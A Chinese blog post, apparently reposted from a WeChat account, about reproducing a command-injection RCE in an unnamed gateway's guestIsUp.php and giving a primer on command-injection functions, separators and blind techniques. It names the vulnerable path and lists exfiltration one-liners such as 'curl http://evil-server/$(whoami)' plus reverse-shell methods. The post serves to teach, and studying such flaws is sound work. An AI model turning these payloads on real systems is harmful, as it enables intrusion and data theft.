关于某网关的RCE复现 ?

  • A+
所属分类:安全文章

注:本篇文章纯属个人意淫行为

本文源于:

昨晚在github看到的一条更新消息,是关于某网关的RCE,然后就想着今天下班了复现一下。于是,便有了这篇水文。


 (有图为证)

关于某网关的RCE复现 ?

所谓多个朋友多条路,自然是找了“某位朋友“要了guestIsUp.php文件源码。

/guest_auth/guestIsUp.php:

关于某网关的RCE复现 ?


这都不用分析了,直接exec执行命令。payload就是利用管道符进行命令注入。

 


直接本地搭建,模拟一下漏洞环境关于某网关的RCE复现 ?

关于某网关的RCE复现 ?


源码需要修改,但是漏洞原理不变。

关于某网关的RCE复现 ?


测试开始:

用burp抓包改一下请求方式,上poc.

关于某网关的RCE复现 ?


复现结束,有图为证:

关于某网关的RCE复现 ?

  

 


正文开始

命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。

该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。

常见危险函数

PHP

systemexecpassthrushell_execpopenproc_open

Python

systempopensubprocess.callspawn

 Java

java.lang.Runtime.getRuntime().exec(command)


常见注入方式

  • 分号分割

  • || && & 分割

  • | 管道符

  • rn %d0%a0 换行

  • 反引号解析

  • $() 替换



无回显技巧

  • bash反弹shell

  • DNS带外数据

    • curl http://evil-server/$(whoami)

    • wget http://evil-server/$(whoami)


  • http带外

  • 无带外时利用 sleep 或其他逻辑构造布尔条件



参考:

https://github.com/Tas9er/EgGateWayGetShellWeb安全学习笔记


本文始发于微信公众号(don9sec):关于某网关的RCE复现 ?

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: